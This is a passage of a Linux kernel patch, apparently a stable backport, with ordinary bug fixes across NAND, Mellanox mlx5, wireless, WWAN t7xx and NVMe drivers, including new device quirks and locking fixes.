+diff --git a/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h b/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
+index 2cda439b5e11b..017868f59f222 100644
+--- a/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
++++ b/drivers/mtd/nand/raw/ingenic/ingenic_ecc.h
+@@ -36,25 +36,25 @@ int ingenic_ecc_correct(struct ingenic_ecc *ecc,
+ void ingenic_ecc_release(struct ingenic_ecc *ecc);
+ struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np);
+ #else /* CONFIG_MTD_NAND_INGENIC_ECC */
+-int ingenic_ecc_calculate(struct ingenic_ecc *ecc,
++static inline int ingenic_ecc_calculate(struct ingenic_ecc *ecc,
+ 			  struct ingenic_ecc_params *params,
+ 			  const u8 *buf, u8 *ecc_code)
+ {
+ 	return -ENODEV;
+ }
+ 
+-int ingenic_ecc_correct(struct ingenic_ecc *ecc,
++static inline int ingenic_ecc_correct(struct ingenic_ecc *ecc,
+ 			struct ingenic_ecc_params *params, u8 *buf,
+ 			u8 *ecc_code)
+ {
+ 	return -ENODEV;
+ }
+ 
+-void ingenic_ecc_release(struct ingenic_ecc *ecc)
++static inline void ingenic_ecc_release(struct ingenic_ecc *ecc)
+ {
+ }
+ 
+-struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np)
++static inline struct ingenic_ecc *of_ingenic_ecc_get(struct device_node *np)
+ {
+ 	return ERR_PTR(-ENODEV);
+ }
+diff --git a/drivers/mtd/nand/raw/marvell_nand.c b/drivers/mtd/nand/raw/marvell_nand.c
+index b9d1e96e33345..a57a1501449aa 100644
+--- a/drivers/mtd/nand/raw/marvell_nand.c
++++ b/drivers/mtd/nand/raw/marvell_nand.c
+@@ -2449,6 +2449,12 @@ static int marvell_nfc_setup_interface(struct nand_chip *chip, int chipnr,
+ 			NDTR1_WAIT_MODE;
+ 	}
+ 
++	/*
++	 * Reset nfc->selected_chip so the next command will cause the timing
++	 * registers to be updated in marvell_nfc_select_target().
++	 */
++	nfc->selected_chip = NULL;
++
+ 	return 0;
+ }
+ 
+@@ -2885,10 +2891,6 @@ static int marvell_nfc_init(struct marvell_nfc *nfc)
+ 		regmap_update_bits(sysctrl_base, GENCONF_CLK_GATING_CTRL,
+ 				   GENCONF_CLK_GATING_CTRL_ND_GATE,
+ 				   GENCONF_CLK_GATING_CTRL_ND_GATE);
+-
+-		regmap_update_bits(sysctrl_base, GENCONF_ND_CLK_CTRL,
+-				   GENCONF_ND_CLK_CTRL_EN,
+-				   GENCONF_ND_CLK_CTRL_EN);
+ 	}
+ 
+ 	/* Configure the DMA if appropriate */
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index a8ff6ee6d58e6..4db1652015d1d 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -7067,7 +7067,7 @@ static int mv88e6xxx_probe(struct mdio_device *mdiodev)
+ 		goto out;
+ 	}
+ 	if (chip->reset)
+-		usleep_range(1000, 2000);
++		usleep_range(10000, 20000);
+ 
+ 	/* Detect if the device is configured in single chip addressing mode,
+ 	 * otherwise continue with address specific smi init/detection.
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 43fdd111235a6..ca7372369b3e6 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1312,7 +1312,7 @@ static enum xgbe_mode xgbe_phy_status_aneg(struct xgbe_prv_data *pdata)
+ 	return pdata->phy_if.phy_impl.an_outcome(pdata);
+ }
+ 
+-static void xgbe_phy_status_result(struct xgbe_prv_data *pdata)
++static bool xgbe_phy_status_result(struct xgbe_prv_data *pdata)
+ {
+ 	struct ethtool_link_ksettings *lks = &pdata->phy.lks;
+ 	enum xgbe_mode mode;
+@@ -1347,8 +1347,13 @@ static void xgbe_phy_status_result(struct xgbe_prv_data *pdata)
+ 
+ 	pdata->phy.duplex = DUPLEX_FULL;
+ 
+-	if (xgbe_set_mode(pdata, mode) && pdata->an_again)
++	if (!xgbe_set_mode(pdata, mode))
++		return false;
++
++	if (pdata->an_again)
+ 		xgbe_phy_reconfig_aneg(pdata);
++
++	return true;
+ }
+ 
+ static void xgbe_phy_status(struct xgbe_prv_data *pdata)
+@@ -1378,7 +1383,8 @@ static void xgbe_phy_status(struct xgbe_prv_data *pdata)
+ 			return;
+ 		}
+ 
+-		xgbe_phy_status_result(pdata);
++		if (xgbe_phy_status_result(pdata))
++			return;
+ 
+ 		if (test_bit(XGBE_LINK_INIT, &pdata->dev_state))
+ 			clear_bit(XGBE_LINK_INIT, &pdata->dev_state);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index d7b2ee5de1158..c4e40834e3ff9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -483,7 +483,7 @@ static void poll_trace(struct mlx5_fw_tracer *tracer,
+ 				(u64)timestamp_low;
+ 		break;
+ 	default:
+-		if (tracer_event->event_id >= tracer->str_db.first_string_trace ||
++		if (tracer_event->event_id >= tracer->str_db.first_string_trace &&
+ 		    tracer_event->event_id <= tracer->str_db.first_string_trace +
+ 					      tracer->str_db.num_string_trace) {
+ 			tracer_event->type = TRACER_EVENT_TYPE_STRING;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_common.c b/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
+index 68f19324db93c..03a99918a8942 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_common.c
+@@ -139,10 +139,8 @@ int mlx5e_refresh_tirs(struct mlx5e_priv *priv, bool enable_uc_lb,
+ 
+ 	inlen = MLX5_ST_SZ_BYTES(modify_tir_in);
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+-	if (!in) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	if (!in)
++		return -ENOMEM;
+ 
+ 	if (enable_uc_lb)
+ 		lb_flags = MLX5_TIRC_SELF_LB_BLOCK_BLOCK_UNICAST;
+@@ -160,14 +158,13 @@ int mlx5e_refresh_tirs(struct mlx5e_priv *priv, bool enable_uc_lb,
+ 		tirn = tir->tirn;
+ 		err = mlx5_core_modify_tir(mdev, tirn, in);
+ 		if (err)
+-			goto out;
++			break;
+ 	}
++	mutex_unlock(&mdev->mlx5e_res.hw_objs.td.list_lock);
+ 
+-out:
+ 	kvfree(in);
+ 	if (err)
+ 		netdev_err(priv->netdev, "refresh tir(0x%x) failed, %d\n", tirn, err);
+-	mutex_unlock(&mdev->mlx5e_res.hw_objs.td.list_lock);
+ 
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 94d010e2d5efd..4e7daa382bc05 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5745,8 +5745,8 @@ void mlx5e_detach_netdev(struct mlx5e_priv *priv)
+ }
+ 
+ static int
+-mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
+-			    const struct mlx5e_profile *new_profile, void *new_ppriv)
++mlx5e_netdev_init_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
++			  const struct mlx5e_profile *new_profile, void *new_ppriv)
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 	int err;
+@@ -5762,6 +5762,25 @@ mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mde
+ 	err = new_profile->init(priv->mdev, priv->netdev);
+ 	if (err)
+ 		goto priv_cleanup;
++
++	return 0;
++
++priv_cleanup:
++	mlx5e_priv_cleanup(priv);
++	return err;
++}
++
++static int
++mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mdev,
++			    const struct mlx5e_profile *new_profile, void *new_ppriv)
++{
++	struct mlx5e_priv *priv = netdev_priv(netdev);
++	int err;
++
++	err = mlx5e_netdev_init_profile(netdev, mdev, new_profile, new_ppriv);
++	if (err)
++		return err;
++
+ 	err = mlx5e_attach_netdev(priv);
+ 	if (err)
+ 		goto profile_cleanup;
+@@ -5769,7 +5788,6 @@ mlx5e_netdev_attach_profile(struct net_device *netdev, struct mlx5_core_dev *mde
+ 
+ profile_cleanup:
+ 	new_profile->cleanup(priv);
+-priv_cleanup:
+ 	mlx5e_priv_cleanup(priv);
+ 	return err;
+ }
+@@ -5788,6 +5806,12 @@ int mlx5e_netdev_change_profile(struct mlx5e_priv *priv,
+ 	priv->profile->cleanup(priv);
+ 	mlx5e_priv_cleanup(priv);
+ 
++	if (mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR) {
++		mlx5e_netdev_init_profile(netdev, mdev, new_profile, new_ppriv);
++		set_bit(MLX5E_STATE_DESTROYING, &priv->state);
++		return -EIO;
++	}
++
+ 	err = mlx5e_netdev_attach_profile(netdev, mdev, new_profile, new_ppriv);
+ 	if (err) { /* roll back to original profile */
+ 		netdev_warn(netdev, "%s: new profile init failed, %d\n", __func__, err);
+@@ -5847,8 +5871,11 @@ static int mlx5e_suspend(struct auxiliary_device *adev, pm_message_t state)
+ 	struct net_device *netdev = priv->netdev;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 
+-	if (!netif_device_present(netdev))
++	if (!netif_device_present(netdev)) {
++		if (test_bit(MLX5E_STATE_DESTROYING, &priv->state))
++			mlx5e_destroy_mdev_resources(mdev);
+ 		return -ENODEV;
++	}
+ 
+ 	mlx5e_detach_netdev(priv);
+ 	mlx5e_destroy_mdev_resources(mdev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 91724c5450a05..077204929fe4a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -896,7 +896,6 @@ static int mlx5_pci_init(struct mlx5_core_dev *dev, struct pci_dev *pdev,
+ 	}
+ 
+ 	mlx5_pci_vsc_init(dev);
+-	dev->caps.embedded_cpu = mlx5_read_embedded_cpu(dev);
+ 	return 0;
+ 
+ err_clr_master:
+@@ -1130,6 +1129,7 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 		goto err_cmd_cleanup;
+ 	}
+ 
++	dev->caps.embedded_cpu = mlx5_read_embedded_cpu(dev);
+ 	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_UP);
+ 
+ 	mlx5_start_health_poll(dev);
+@@ -1753,14 +1753,15 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+-	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+-	 * fw_reset before unregistering the devlink.
++	/* mlx5_drain_fw_reset() and mlx5_drain_health_wq() are using
++	 * devlink notify APIs.
++	 * Hence, we must drain them before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
++	mlx5_drain_health_wq(dev);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+-	mlx5_drain_health_wq(dev);
+ 	mlx5_uninit_one(dev);
+ 	mlx5_pci_close(dev);
+ 	mlx5_mdev_uninit(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index a7377619ba6f2..2424cdf9cca99 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -63,6 +63,7 @@ static void mlx5_sf_dev_remove(struct auxiliary_device *adev)
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 	struct devlink *devlink = priv_to_devlink(sf_dev->mdev);
+ 
++	mlx5_drain_health_wq(sf_dev->mdev);
+ 	devlink_unregister(devlink);
+ 	mlx5_uninit_one(sf_dev->mdev);
+ 	iounmap(sf_dev->mdev->iseg);
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index afa3b92a6905f..0d5a41a2ae010 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -245,12 +245,6 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 
+ 		skb = priv->rx_skb[rx_pi_rem];
+ 
+-		skb_put(skb, datalen);
+-
+-		skb->ip_summed = CHECKSUM_NONE; /* device did not checksum packet */
+-
+-		skb->protocol = eth_type_trans(skb, netdev);
+-
+ 		/* Alloc another RX SKB for this same index */
+ 		rx_skb = mlxbf_gige_alloc_skb(priv, MLXBF_GIGE_DEFAULT_BUF_SZ,
+ 					      &rx_buf_dma, DMA_FROM_DEVICE);
+@@ -259,6 +253,13 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 		priv->rx_skb[rx_pi_rem] = rx_skb;
+ 		dma_unmap_single(priv->dev, *rx_wqe_addr,
+ 				 MLXBF_GIGE_DEFAULT_BUF_SZ, DMA_FROM_DEVICE);
++
++		skb_put(skb, datalen);
++
++		skb->ip_summed = CHECKSUM_NONE; /* device did not checksum packet */
++
++		skb->protocol = eth_type_trans(skb, netdev);
++
+ 		*rx_wqe_addr = rx_buf_dma;
+ 	} else if (rx_cqe & MLXBF_GIGE_RX_CQE_PKT_STATUS_MAC_ERR) {
+ 		priv->stats.rx_mac_errors++;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 2cc28af52ee25..45c2585011351 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1324,7 +1324,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x2001, 0x7e3d, 4)},	/* D-Link DWM-222 A2 */
+ 	{QMI_FIXED_INTF(0x2020, 0x2031, 4)},	/* Olicard 600 */
+ 	{QMI_FIXED_INTF(0x2020, 0x2033, 4)},	/* BroadMobi BM806U */
+-	{QMI_FIXED_INTF(0x2020, 0x2060, 4)},	/* BroadMobi BM818 */
++	{QMI_QUIRK_SET_DTR(0x2020, 0x2060, 4)},	/* BroadMobi BM818 */
+ 	{QMI_FIXED_INTF(0x0f3d, 0x68a2, 8)},    /* Sierra Wireless MC7700 */
+ 	{QMI_FIXED_INTF(0x114f, 0x68a2, 8)},    /* Sierra Wireless MC7750 */
+ 	{QMI_FIXED_INTF(0x1199, 0x68a2, 8)},	/* Sierra Wireless MC7710 in QMI mode */
+diff --git a/drivers/net/wireless/broadcom/b43/b43.h b/drivers/net/wireless/broadcom/b43/b43.h
+index 9fc7c088a539e..67b4bac048e58 100644
+--- a/drivers/net/wireless/broadcom/b43/b43.h
++++ b/drivers/net/wireless/broadcom/b43/b43.h
+@@ -651,7 +651,7 @@ struct b43_iv {
+ 	union {
+ 		__be16 d16;
+ 		__be32 d32;
+-	} data __packed;
++	} __packed data;
+ } __packed;
+ 
+ 
+diff --git a/drivers/net/wireless/broadcom/b43legacy/b43legacy.h b/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
+index 6b0cec467938f..f49365d14619f 100644
+--- a/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
++++ b/drivers/net/wireless/broadcom/b43legacy/b43legacy.h
+@@ -379,7 +379,7 @@ struct b43legacy_iv {
+ 	union {
+ 		__be16 d16;
+ 		__be32 d32;
+-	} data __packed;
++	} __packed data;
+ } __packed;
+ 
+ #define B43legacy_PHYMODE(phytype)	(1 << (phytype))
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rs.c b/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
+index 0b50b816684a0..2be6801d48aca 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rs.c
+@@ -2692,6 +2692,8 @@ static void rs_drv_get_rate(void *mvm_r, struct ieee80211_sta *sta,
+ 		return;
+ 
+ 	lq_sta = mvm_sta;
++
++	spin_lock(&lq_sta->pers.lock);
+ 	iwl_mvm_hwrate_to_tx_rate_v1(lq_sta->last_rate_n_flags,
+ 				     info->band, &info->control.rates[0]);
+ 	info->control.rates[0].count = 1;
+@@ -2706,6 +2708,7 @@ static void rs_drv_get_rate(void *mvm_r, struct ieee80211_sta *sta,
+ 		iwl_mvm_hwrate_to_tx_rate_v1(last_ucode_rate, info->band,
+ 					     &txrc->reported_rate);
+ 	}
++	spin_unlock(&lq_sta->pers.lock);
+ }
+ 
+ static void *rs_drv_alloc_sta(void *mvm_rate, struct ieee80211_sta *sta,
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+index 1ba66b8f70c95..cda3b802e89dd 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+@@ -1346,6 +1346,7 @@ struct rtl8xxxu_priv {
+ 	u32 rege9c;
+ 	u32 regeb4;
+ 	u32 regebc;
++	u32 regrcr;
+ 	int next_mbox;
+ 	int nr_out_eps;
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 95c0150f23569..3a9fa3ff37acc 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4049,6 +4049,7 @@ static int rtl8xxxu_init_device(struct ieee80211_hw *hw)
+ 		RCR_ACCEPT_MGMT_FRAME | RCR_HTC_LOC_CTRL |
+ 		RCR_APPEND_PHYSTAT | RCR_APPEND_ICV | RCR_APPEND_MIC;
+ 	rtl8xxxu_write32(priv, REG_RCR, val32);
++	priv->regrcr = val32;
+ 
+ 	/*
+ 	 * Accept all multicast
+@@ -6058,7 +6059,7 @@ static void rtl8xxxu_configure_filter(struct ieee80211_hw *hw,
+ 				      unsigned int *total_flags, u64 multicast)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+-	u32 rcr = rtl8xxxu_read32(priv, REG_RCR);
++	u32 rcr = priv->regrcr;
+ 
+ 	dev_dbg(&priv->udev->dev, "%s: changed_flags %08x, total_flags %08x\n",
+ 		__func__, changed_flags, *total_flags);
+@@ -6104,6 +6105,7 @@ static void rtl8xxxu_configure_filter(struct ieee80211_hw *hw,
+ 	 */
+ 
+ 	rtl8xxxu_write32(priv, REG_RCR, rcr);
++	priv->regrcr = rcr;
+ 
+ 	*total_flags &= (FIF_ALLMULTI | FIF_FCSFAIL | FIF_BCN_PRBRESP_PROMISC |
+ 			 FIF_CONTROL | FIF_OTHER_BSS | FIF_PSPOLL |
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.c b/drivers/net/wwan/t7xx/t7xx_pci.c
+index 226fc1703e90f..91256e005b846 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.c
++++ b/drivers/net/wwan/t7xx/t7xx_pci.c
+@@ -45,6 +45,7 @@
+ #define T7XX_PCI_IREG_BASE		0
+ #define T7XX_PCI_EREG_BASE		2
+ 
++#define T7XX_INIT_TIMEOUT		20
+ #define PM_SLEEP_DIS_TIMEOUT_MS		20
+ #define PM_ACK_TIMEOUT_MS		1500
+ #define PM_AUTOSUSPEND_MS		20000
+@@ -96,6 +97,7 @@ static int t7xx_pci_pm_init(struct t7xx_pci_dev *t7xx_dev)
+ 	spin_lock_init(&t7xx_dev->md_pm_lock);
+ 	init_completion(&t7xx_dev->sleep_lock_acquire);
+ 	init_completion(&t7xx_dev->pm_sr_ack);
++	init_completion(&t7xx_dev->init_done);
+ 	atomic_set(&t7xx_dev->md_pm_state, MTK_PM_INIT);
+ 
+ 	device_init_wakeup(&pdev->dev, true);
+@@ -124,6 +126,7 @@ void t7xx_pci_pm_init_late(struct t7xx_pci_dev *t7xx_dev)
+ 	pm_runtime_mark_last_busy(&t7xx_dev->pdev->dev);
+ 	pm_runtime_allow(&t7xx_dev->pdev->dev);
+ 	pm_runtime_put_noidle(&t7xx_dev->pdev->dev);
++	complete_all(&t7xx_dev->init_done);
+ }
+ 
+ static int t7xx_pci_pm_reinit(struct t7xx_pci_dev *t7xx_dev)
+@@ -529,6 +532,20 @@ static void t7xx_pci_shutdown(struct pci_dev *pdev)
+ 	__t7xx_pci_pm_suspend(pdev);
+ }
+ 
++static int t7xx_pci_pm_prepare(struct device *dev)
++{
++	struct pci_dev *pdev = to_pci_dev(dev);
++	struct t7xx_pci_dev *t7xx_dev;
++
++	t7xx_dev = pci_get_drvdata(pdev);
++	if (!wait_for_completion_timeout(&t7xx_dev->init_done, T7XX_INIT_TIMEOUT * HZ)) {
++		dev_warn(dev, "Not ready for system sleep.\n");
++		return -ETIMEDOUT;
++	}
++
++	return 0;
++}
++
+ static int t7xx_pci_pm_suspend(struct device *dev)
+ {
+ 	return __t7xx_pci_pm_suspend(to_pci_dev(dev));
+@@ -555,6 +572,7 @@ static int t7xx_pci_pm_runtime_resume(struct device *dev)
+ }
+ 
+ static const struct dev_pm_ops t7xx_pci_pm_ops = {
++	.prepare = t7xx_pci_pm_prepare,
+ 	.suspend = t7xx_pci_pm_suspend,
+ 	.resume = t7xx_pci_pm_resume,
+ 	.resume_noirq = t7xx_pci_pm_resume_noirq,
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.h b/drivers/net/wwan/t7xx/t7xx_pci.h
+index 50b37056ce5a4..5dffe24ef37b4 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.h
++++ b/drivers/net/wwan/t7xx/t7xx_pci.h
+@@ -69,6 +69,7 @@ struct t7xx_pci_dev {
+ 	struct t7xx_modem	*md;
+ 	struct t7xx_ccmni_ctrl	*ccmni_ctlb;
+ 	bool			rgu_pci_irq_en;
++	struct completion	init_done;
+ 
+ 	/* Low Power Items */
+ 	struct list_head	md_pm_entities;
+diff --git a/drivers/nvme/host/constants.c b/drivers/nvme/host/constants.c
+index e958d50155857..5766ceba2fec9 100644
+--- a/drivers/nvme/host/constants.c
++++ b/drivers/nvme/host/constants.c
+@@ -21,7 +21,7 @@ static const char * const nvme_ops[] = {
+ 	[nvme_cmd_resv_release] = "Reservation Release",
+ 	[nvme_cmd_zone_mgmt_send] = "Zone Management Send",
+ 	[nvme_cmd_zone_mgmt_recv] = "Zone Management Receive",
+-	[nvme_cmd_zone_append] = "Zone Management Append",
++	[nvme_cmd_zone_append] = "Zone Append",
+ };
+ 
+ static const char * const nvme_admin_ops[] = {
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index f502e032e7e46..2e22c78991ccf 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3540,6 +3540,9 @@ static ssize_t nvme_sysfs_delete(struct device *dev,
+ {
+ 	struct nvme_ctrl *ctrl = dev_get_drvdata(dev);
+ 
++	if (!test_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags))
++		return -EBUSY;
++
+ 	if (device_remove_file_self(dev, attr))
+ 		nvme_delete_ctrl_sync(ctrl);
+ 	return count;
+@@ -4980,7 +4983,7 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl)
+ 	 * that were missed. We identify persistent discovery controllers by
+ 	 * checking that they started once before, hence are reconnecting back.
+ 	 */
+-	if (test_and_set_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags) &&
++	if (test_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags) &&
+ 	    nvme_discovery_ctrl(ctrl))
+ 		nvme_change_uevent(ctrl, "NVME_EVENT=rediscover");
+ 
+@@ -4991,6 +4994,7 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl)
+ 	}
+ 
+ 	nvme_change_uevent(ctrl, "NVME_EVENT=connected");
++	set_bit(NVME_CTRL_STARTED_ONCE, &ctrl->flags);
+ }
+ EXPORT_SYMBOL_GPL(nvme_start_ctrl);
+ 
+diff --git a/drivers/nvme/host/hwmon.c b/drivers/nvme/host/hwmon.c
+index 9e6e56c20ec99..316f3e4ca7cc6 100644
+--- a/drivers/nvme/host/hwmon.c
++++ b/drivers/nvme/host/hwmon.c
+@@ -163,7 +163,9 @@ static umode_t nvme_hwmon_is_visible(const void *_data,
+ 	case hwmon_temp_max:
+ 	case hwmon_temp_min:
+ 		if ((!channel && data->ctrl->wctemp) ||
+-		    (channel && data->log->temp_sensor[channel - 1])) {
++		    (channel && data->log->temp_sensor[channel - 1] &&
++		     !(data->ctrl->quirks &
++		       NVME_QUIRK_NO_SECONDARY_TEMP_THRESH))) {
+ 			if (data->ctrl->quirks &
+ 			    NVME_QUIRK_NO_TEMP_THRESH_CHANGE)
+ 				return 0444;
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index d09ed00701743..f96d330d39641 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -858,7 +858,6 @@ void nvme_mpath_remove_disk(struct nvme_ns_head *head)
+ {
+ 	if (!head->disk)
+ 		return;
+-	blk_mark_disk_dead(head->disk);
+ 	/* make sure all pending bios are cleaned up */
+ 	kblockd_schedule_work(&head->requeue_work);
+ 	flush_work(&head->requeue_work);
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 01d90424af534..3f82de6060ef7 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -149,6 +149,11 @@ enum nvme_quirks {
+ 	 * Reports garbage in the namespace identifiers (eui64, nguid, uuid).
+ 	 */
+ 	NVME_QUIRK_BOGUS_NID			= (1 << 18),
++
++	/*
++	 * No temperature thresholds for channels other than 0 (Composite).
++	 */
++	NVME_QUIRK_NO_SECONDARY_TEMP_THRESH	= (1 << 19),
+ };
+ 
+ /*
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 581bf94416e6d..ba4903c86f7ff 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3515,6 +3515,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_NO_DEEPEST_PS, },
+ 	{ PCI_DEVICE(0x2646, 0x2263),   /* KINGSTON A2000 NVMe SSD  */
+ 		.driver_data = NVME_QUIRK_NO_DEEPEST_PS, },
++	{ PCI_DEVICE(0x2646, 0x5013),   /* Kingston KC3000, Kingston FURY Renegade */
++		.driver_data = NVME_QUIRK_NO_SECONDARY_TEMP_THRESH, },
+ 	{ PCI_DEVICE(0x2646, 0x5018),   /* KINGSTON OM8SFP4xxxxP OS21012 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x5016),   /* KINGSTON OM3PGP4xxxxP OS21011 NVMe SSD */
+@@ -3554,6 +3556,10 @@ static const struct pci_device_id nvme_id_table[] = {
+ 				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
+ 	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1e4b, 0x1602), /* HS-SSD-FUTURE 2048G  */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x10ec, 0x5765), /* TEAMGROUP MP33 2TB SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0065),
+diff --git a/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c b/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
+index c14089fa7db49..cabdddbbabfd7 100644
+--- a/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
++++ b/drivers/phy/amlogic/phy-meson-g12a-mipi-dphy-analog.c
+@@ -70,7 +70,7 @@ static int phy_g12a_mipi_dphy_analog_power_on(struct phy *phy)
+ 		     HHI_MIPI_CNTL1_BANDGAP);
+ 
+ 	regmap_write(priv->regmap, HHI_MIPI_CNTL2,
+-		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL0, 0x459) |
++		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL0, 0x45a) |
+ 		     FIELD_PREP(HHI_MIPI_CNTL2_DIF_TX_CTL1, 0x2680));
+ 
+ 	reg = DSI_LANE_CLK;
